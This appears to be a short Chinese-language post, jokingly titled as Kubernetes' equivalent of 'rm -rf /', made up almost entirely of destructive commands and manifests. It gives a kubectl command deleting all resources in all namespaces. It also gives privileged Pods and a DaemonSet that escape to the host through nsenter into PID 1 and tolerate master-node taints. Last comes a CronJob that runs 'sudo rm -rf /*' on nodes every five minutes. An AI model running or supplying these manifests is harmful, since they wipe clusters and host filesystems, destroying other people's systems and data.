Kuberntes 系统下的 `rm rf /`，执行完就可以跑路了

1

kubectl delete all --all --all-namespaces

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: danger-1
  namespace: default
spec:
  containers:
    - command: ["sh"]
      args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
      image: docker.io/alpine:3.12
      name: pod-test
      securityContext:
        privileged: true
  hostIPC: true
  hostNetwork: true
  hostPID: true
  tolerations:
  - effect: NoSchedule
    key: node-role.kubernetes.io/master
  - key: CriticalAddonsOnly
    operator: Exists
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 60
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 60
EOF

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: danger-1
  namespace: default
spec:
  affinity:
    nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
      - preference:
          matchExpressions:
          - key: node-role.kubernetes.io/master
            operator: In
            values:
            - ""
        weight: 100
  containers:
    - command: ["sh"]
      args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
      image: docker.io/alpine:3.12
      name: pod-test
      securityContext:
        privileged: true
  tolerations:
  - effect: NoSchedule
    key: node-role.kubernetes.io/master
  - key: CriticalAddonsOnly
    operator: Exists
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 60
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 60
  hostIPC: true
  hostNetwork: true
  hostPID: true
EOF

cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: danger-3
spec:
  selector:
    matchLabels:
      danger.kubernetes.io/name: d3
  template:
    metadata:
      labels:
        danger.kubernetes.io/name: d3
    spec:
      containers:
        - command: ["sh"]
          args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
          image: docker.io/alpine:3.12
          name: pod-test
          securityContext:
            privileged: true
      hostIPC: true
      hostNetwork: true
      hostPID: true
      tolerations:
      - effect: NoSchedule
        key: node-role.kubernetes.io/master
      - key: CriticalAddonsOnly
        operator: Exists
      - effect: NoExecute
        key: node.kubernetes.io/not-ready
        operator: Exists
        tolerationSeconds: 60
      - effect: NoExecute
        key: node.kubernetes.io/unreachable
        operator: Exists
        tolerationSeconds: 60
EOF

cat <<EOF | kubectl apply -f -
apiVersion: batch/v1beta1
kind: CronJob
metadata:
  name: danger-4
spec:
  schedule: "*/5 * * * *"
  jobTemplate:
    spec:
      template:
        spec:
          containers:
            - command: ["sh"]
              args: ["-c", "echo 'sudo rm -rf /*' | nsenter -t 1 -m -u -i -n"]
              image: docker.io/alpine:3.12
              name: pod-test
              securityContext:
                privileged: true
          restartPolicy: OnFailure
          hostIPC: true
          hostNetwork: true
          hostPID: true
          tolerations:
          - effect: NoSchedule
            key: node-role.kubernetes.io/master
          - key: CriticalAddonsOnly
            operator: Exists
          - effect: NoExecute
            key: node.kubernetes.io/not-ready
            operator: Exists
            tolerationSeconds: 60
          - effect: NoExecute
            key: node.kubernetes.io/unreachable
            operator: Exists
            tolerationSeconds: 60
EOF